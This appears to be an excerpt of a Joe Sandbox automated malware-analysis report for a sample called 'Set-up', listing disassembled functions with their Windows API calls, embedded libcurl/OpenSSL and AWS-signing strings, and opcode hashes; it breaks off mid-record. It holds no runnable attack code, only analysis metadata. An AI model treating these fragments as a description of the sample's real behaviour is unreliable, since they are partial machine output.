Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 5b8b482e1667cabfd2627a547625662cfa5bc4199cc9b28942524a9c90ba6165
Instruction ID: 3c5cfc64a96cb8e32fdb30114361698c1e9afbae8e381d8ff4cbb5ecadf6ae62
Opcode Fuzzy Hash: 5b8b482e1667cabfd2627a547625662cfa5bc4199cc9b28942524a9c90ba6165
Instruction Fuzzy Hash: 09E0EC34A0060197CE24AA54C988A5B776B7FC0718F68CA68E42C9A595D73ADC57C741

Function 00E267E0 Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32(?,8004667E), ref: 00E267FB

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ioctlsocket
String ID:
API String ID: 3577187118-0
Opcode ID: a9f60cf4eeb631196c0364f0fa83fc32f91a498cc5d1b0744e1fa90e529f06df
Instruction ID: f353437333aff58553f02e24d566afd7ee248f4e9e22abc0321d2575c1a30c0e
Opcode Fuzzy Hash: a9f60cf4eeb631196c0364f0fa83fc32f91a498cc5d1b0744e1fa90e529f06df
Instruction Fuzzy Hash: 8CC012F1508600EFC7084B64D449A5E77E9EB48265F01441CB046C2250DB749460DF16

Function 00E79270 Relevance: 1.4, APIs: 1, Instructions: 165COMMON

Download Yara Rule

APIs

Part of subcall function 00E7A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00E7A499
Part of subcall function 00E7A440: GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 00E7A4FB
Part of subcall function 00E7A440: RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00E7AA19

Part of subcall function 00E79B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(LOCALDOMAIN,00000000,00000000,?,0000000F,?,00E792A4,?,?,?,?,?,?,?,?,00000000), ref: 00E79B6E
Part of subcall function 00E79B60: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(RES_OPTIONS,?,?,?,?,?,?,?,?,00000000,?,0000000F,00E74860,00000000), ref: 00E79C24

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,0000000F), ref: 00E793C3

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: AdaptersAddressesgetenv$Openmemcpy
String ID:
API String ID: 1905038125-0
Opcode ID: f7da8a369a8c91ef137eabeb304aa4bf33c612cf4da87e2df4efb8722dd9c8ab
Instruction ID: 57c0ee6e26855ab22d4dcfbb6e154db94f8bc53df84b5f121be1d4f5861525eb
Opcode Fuzzy Hash: f7da8a369a8c91ef137eabeb304aa4bf33c612cf4da87e2df4efb8722dd9c8ab
Instruction Fuzzy Hash: A751D771904302ABD710DF24D98572AB7E0BF94348F08952CFC5DA3662E731EC65D782

Function 0126F920 Relevance: 1.3, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00000000,0126B9E5,?,?,?,?,?,0126B371), ref: 0126F955

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 7049c865ebcd5e733f5d97fca3852e9f3aec14c4ad0be61177c872eecbb0c094
Instruction ID: d60fa3426caafddeb4136efd1e04115614a962bfe187a8f75a9cce705c9bfb8c
Opcode Fuzzy Hash: 7049c865ebcd5e733f5d97fca3852e9f3aec14c4ad0be61177c872eecbb0c094
Instruction Fuzzy Hash: 10E0EDB46197029BDB20FF69E5D091BB7E8BF68628B05092CD9C647341D770E9448B62

Function 01270610 Relevance: 1.3, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,0126B9F0,?,?,?,?,?,0126B371), ref: 01270621

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 60fdf185321d71b77c17128ac75242e5021d0b49bdd4bd6d2be6d06b24295c34
Instruction ID: dfffdd834cba3da663d8b05db567dfe25ffb40b62f31916980b45d8c54b39fdb
Opcode Fuzzy Hash: 60fdf185321d71b77c17128ac75242e5021d0b49bdd4bd6d2be6d06b24295c34
Instruction Fuzzy Hash: 78D0A9B19053058FCB00BEA8A8C040F77E8BBA5618FC0059CEEC41B202E339951A87C3

Function 00F9CBC0 Relevance: 1.3, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00F77254,?,crypto/err/err_local.h,00000039,00000000,?,00040000,?,00F740BB,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F9CBD2

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: aaf56d33668227a20a0b4efd32423ec7ebd587dd795231f4b2af0c53bb40d174
Instruction ID: 7bebaefa2d8cae08711b6a9874d35c6bd5a8227a6292374101deaae3a04fac90
Opcode Fuzzy Hash: aaf56d33668227a20a0b4efd32423ec7ebd587dd795231f4b2af0c53bb40d174
Instruction Fuzzy Hash: 32B092AA884100ABFA1A6E08B89A82B7291E7E0B14FD40820F645C00A1E3219C15B692

Non-executed Functions

Function 00E362E0 Relevance: 123.9, APIs: 9, Strings: 72, Instructions: 2363stringCOMMON

Download Yara Rule

APIs

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,Unknown error), ref: 00E36E74
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00E36F8A
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,000007FF), ref: 00E37184
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E37263
memcmp.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00E375B8

Part of subcall function 00F8F870: memset.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000,00000800), ref: 00F8F8AE

Strings

pqg, xrefs: 00E36A29, 00E36A7E, 00E36B13, 00E36B6C
SSL certificate verify result: %s (%ld), xrefs: 00E37FB0
No OCSP response received, xrefs: 00E379D8
subjectAltName: host "%s" matched cert's IP address!, xrefs: 00E37607
%02x:, xrefs: 00E36CE8
SSL: illegal cert name field, xrefs: 00E38078
Signature, xrefs: 00E36D1F
Version, xrefs: 00E3654F
BIO_new return NULL, OpenSSL error %s, xrefs: 00E36E7D, 00E37E52
Unable to load public key, xrefs: 00E369DB
SSL: Unable to read issuer cert (%s), xrefs: 00E37995
SSL: public key does not match pinned public key, xrefs: 00E382B2
Invalid OCSP response status: %s (%d), xrefs: 00E377F8
expire date: %.*s, xrefs: 00E370E2
OCSP response has expired, xrefs: 00E38414
SSL certificate verify ok., xrefs: 00E3809E
: , xrefs: 00E378FE
SSL certificate status: %s (%d), xrefs: 00E383B6
<, xrefs: 00E37F90
Unknown error, xrefs: 00E36E6A, 00E36E72, 00E37941, 00E37949
RSA Public Key, xrefs: 00E36C31
SSL certificate verify result: %s (%ld), continuing anyway., xrefs: 00E37D38
Error getting peer certificate, xrefs: 00E38153
Public Key Algorithm, xrefs: 00E36725
Start date, xrefs: 00E36887
Subject, xrefs: 00E3648C
BIO_new_mem_buf NULL, OpenSSL error %s, xrefs: 00E37954
Proxy, xrefs: 00E36F01
%lx, xrefs: 00E36524
common name: %s (matched), xrefs: 00E37F17
subjectAltName does not match %s %s, xrefs: 00E37B11
ipv4 address, xrefs: 00E37AD2
SSL certificate revocation reason: %s (%d), xrefs: 00E383F1
SSL certificate issuer check ok (%s), xrefs: 00E37CAF
SSL: unable to obtain common name from peer certificate, xrefs: 00E37F29
No error, xrefs: 00E36E65, 00E3793C
vtls/openssl.c, xrefs: 00E37BD2, 00E37F54, 00E38217, 00E38278, 00E38293
subject: %s, xrefs: 00E37021
%s/%s, xrefs: 00E36E01, 00E378D8
issuer: %s, xrefs: 00E371CE
Could not get peer certificate chain, xrefs: 00E38122
SSL: Certificate issuer check failed (%s), xrefs: 00E37867
Could not find certificate ID in OCSP response, xrefs: 00E3840A
Error computing OCSP ID, xrefs: 00E3806E
SSL: certificate subject name '%s' does not match target hostname '%s', xrefs: 00E38133
Signature Algorithm, xrefs: 00E366A6
pub_key, xrefs: 00E36AD6, 00E36BC4
Serial Number, xrefs: 00E365F1
subjectAltName: host "%s" matched cert's "%s", xrefs: 00E380EC
SSL: could not get peer certificate, xrefs: 00E36FD5
SSL: could not get X509-issuer name, xrefs: 00E372C2
Server, xrefs: 00E36F06, 00E36F10
%02x, xrefs: 00E365C8
ipv6 address, xrefs: 00E37AD7
OCSP response verification failed, xrefs: 00E3814C
hostname, xrefs: 00E37AE1, 00E37B10, 00E37B29
SSL: no alternative certificate subject name matches target %s '%s', xrefs: 00E37B2A
/%s, xrefs: 00E37489, 00E37741
OpenSSL, xrefs: 00E36DFC, 00E378D3
start date: %.*s, xrefs: 00E3707C
Cert, xrefs: 00E36D7F
[NONE], xrefs: 00E37011
Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s, xrefs: 00E3736B
rsa, xrefs: 00E36C56, 00E36C75
dsa, xrefs: 00E36B71, 00E36B90, 00E36BAE, 00E36BC9
SSL: Unable to open issuer cert (%s), xrefs: 00E37232
Issuer, xrefs: 00E364EF
unexpected ssl peer type: %d, xrefs: 00E37621
%s certificate:, xrefs: 00E36F11
Remove session ID again from cache, xrefs: 00E37DD4
Expire date, xrefs: 00E368EE
Invalid OCSP response, xrefs: 00E37D4B, 00E380B1

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy$memcmpmemsetstrcpystrlen
String ID: Unable to load public key$ Certificate level %d: Public key type %s%s (%d/%d Bits/secBits), signed using %s$ SSL certificate issuer check ok (%s)$ SSL certificate verify ok.$ SSL certificate verify result: %s (%ld), continuing anyway.$ common name: %s (matched)$ expire date: %.*s$ issuer: %s$ start date: %.*s$ subject: %s$ subjectAltName does not match %s %s$ subjectAltName: host "%s" matched cert's "%s"$ subjectAltName: host "%s" matched cert's IP address!$%02x$%02x:$%lx$%s certificate:$%s/%s$/%s$: $<$BIO_new return NULL, OpenSSL error %s$BIO_new_mem_buf NULL, OpenSSL error %s$Cert$Could not find certificate ID in OCSP response$Could not get peer certificate chain$Error computing OCSP ID$Error getting peer certificate$Expire date$Invalid OCSP response$Invalid OCSP response status: %s (%d)$Issuer$No OCSP response received$No error$OCSP response has expired$OCSP response verification failed$OpenSSL$Proxy$Public Key Algorithm$RSA Public Key$Remove session ID again from cache$SSL certificate revocation reason: %s (%d)$SSL certificate status: %s (%d)$SSL certificate verify result: %s (%ld)$SSL: Certificate issuer check failed (%s)$SSL: Unable to open issuer cert (%s)$SSL: Unable to read issuer cert (%s)$SSL: certificate subject name '%s' does not match target hostname '%s'$SSL: could not get X509-issuer name$SSL: could not get peer certificate$SSL: illegal cert name field$SSL: no alternative certificate subject name matches target %s '%s'$SSL: public key does not match pinned public key$SSL: unable to obtain common name from peer certificate$Serial Number$Server$Signature$Signature Algorithm$Start date$Subject$Unknown error$Version$[NONE]$dsa$hostname$ipv4 address$ipv6 address$pqg$pub_key$rsa$unexpected ssl peer type: %d$vtls/openssl.c
API String ID: 838718518-248801092
Opcode ID: b0dfa598f0b7f5c33fc7e8a03df4f12d8fb50a61deb8e109d0cc48da77f3efc8
Instruction ID: e9d830a30cfcb779483ce0582a506c6638ba7e58b7699ab983cca408c89ca4b2
Opcode Fuzzy Hash: b0dfa598f0b7f5c33fc7e8a03df4f12d8fb50a61deb8e109d0cc48da77f3efc8
Instruction Fuzzy Hash: 30031BB5A083406BE730AB209C46BBB7AD8AF9170CF08542CFD8D66253F775A914D793

Function 00E1E6A0 Relevance: 120.2, APIs: 39, Strings: 29, Instructions: 1230stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01148870: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 011488AA

strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 00E1E8EB
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,0000002E), ref: 00E1E907
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000000), ref: 00E1E96C
strchr.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,0000003A), ref: 00E1EA3C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000001), ref: 00E1EA5F
_time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E1EC0A
strftime.API-MS-WIN-CRT-TIME-L1-1-0(?,00000011,%Y%m%dT%H%M%SZ,?), ref: 00E1ED17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E1ED37
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E1EE03
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E1EE24
strcspn.API-MS-WIN-CRT-STRING-L1-1-0(?,013B3AB1), ref: 00E1EE32

Strings

aws_sigv4: picked service %s from host, xrefs: 00E1E9A4
;:, xrefs: 00E1F1EA
Authorization, xrefs: 00E1E7E2
%64[^:]:%64[^:]:%64[^:]:%64s, xrefs: 00E1E87D
+, xrefs: 00E1E8D1
aws-sigv4: region too long in hostname, xrefs: 00E1EB8A
x-%s-date:%s, xrefs: 00E1ED8F
x-%s-content-sha256: %s, xrefs: 00E1EBDF
x-%s-content-sha256, xrefs: 00E1EA1A
first aws-sigv4 provider cannot be empty, xrefs: 00E1E8BD
http_aws_sigv4.c, xrefs: 00E1EC81, 00E1EC94, 00E1ECA7, 00E1ECBA, 00E1ECCD, 00E1ECE3, 00E1EFD2, 00E1F014, 00E1F773
%s4%s, xrefs: 00E1F5D5
aws:amz, xrefs: 00E1E855, 00E1E882
Host, xrefs: 00E1EDA1
Date, xrefs: 00E1F04F
%s4-HMAC-SHA256%s%s%s, xrefs: 00E1F59C
%s%s%s%s%s%.*s, xrefs: 00E1F47A
aws-sigv4: service too long in hostname, xrefs: 00E1E91E
aws, xrefs: 00E1E9D4
%Y%m%dT%H%M%SZ, xrefs: 00E1ED0F
X-%s-Date, xrefs: 00E1ED6A
%s/%s/%s/%s, xrefs: 00E1F4DB
host:%s, xrefs: 00E1EE68
aws_sigv4: picked region %s from host, xrefs: 00E1F14C
Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s, xrefs: 00E1F758
aws-sigv4: service missing in parameters and hostname, xrefs: 00E1E92C
%s: %s, xrefs: 00E1F1A4
aws-sigv4: region missing in parameters and hostname, xrefs: 00E1F0E4
%s4_request, xrefs: 00E1F4AD

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$strchrstrcpy$__stdio_common_vsscanf_time64memcpystrcspnstrftime
String ID: ;:$%64[^:]:%64[^:]:%64[^:]:%64s$%Y%m%dT%H%M%SZ$%s%s%s%s%s%.*s$%s/%s/%s/%s$%s4%s$%s4-HMAC-SHA256%s%s%s$%s4_request$%s: %s$+$Authorization$Authorization: %s4-HMAC-SHA256 Credential=%s/%s, SignedHeaders=%s, Signature=%s%s%s$Date$Host$X-%s-Date$aws$aws-sigv4: region missing in parameters and hostname$aws-sigv4: region too long in hostname$aws-sigv4: service missing in parameters and hostname$aws-sigv4: service too long in hostname$aws:amz$aws_sigv4: picked region %s from host$aws_sigv4: picked service %s from host$first aws-sigv4 provider cannot be empty$host:%s$http_aws_sigv4.c$x-%s-content-sha256$x-%s-content-sha256: %s$x-%s-date:%s
API String ID: 3777502179-657784405
Opcode ID: 057691a49217fd8369301bbf85e177f5e54d187048a316fc9696e8087e13909a
Instruction ID: 7100fdf9ae0127e19f29ce5bdfe62ea7a887b3d1d144adad3d45dac38c267f70
Opcode Fuzzy Hash: 057691a49217fd8369301bbf85e177f5e54d187048a316fc9696e8087e13909a
Instruction Fuzzy Hash: E092E8B19083416BE730DB609C45BEB77E8AF95708F04582DFD89A7242F771A984C7A3

Function 0114E050 Relevance: 119.3, APIs: 64, Strings: 3, Instructions: 2082COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 0114E0B3
localeconv.MSVCRT ref: 0114E0BE
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0114E149
isspace.API-MS-WIN-CRT-STRING-L1-1-0 ref: 0114E179
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0114E1D8
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0114E1FA
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0114E20F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0114F886

Strings

d, xrefs: 0114EAAF
nil), xrefs: 0115041D
, xrefs: 0114FED0

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: free$isspacelocaleconv$_errno
String ID: $d$nil)
API String ID: 577766270-394766432
Opcode ID: 470507f0a366c9551d8fb1f43d93df267f055bfc09dc2daf15c294aef085ad29
Instruction ID: ec80078b53135ae8aeeb2e0a69bc0d6185c01c52fa146577bf2dc87a3461c287
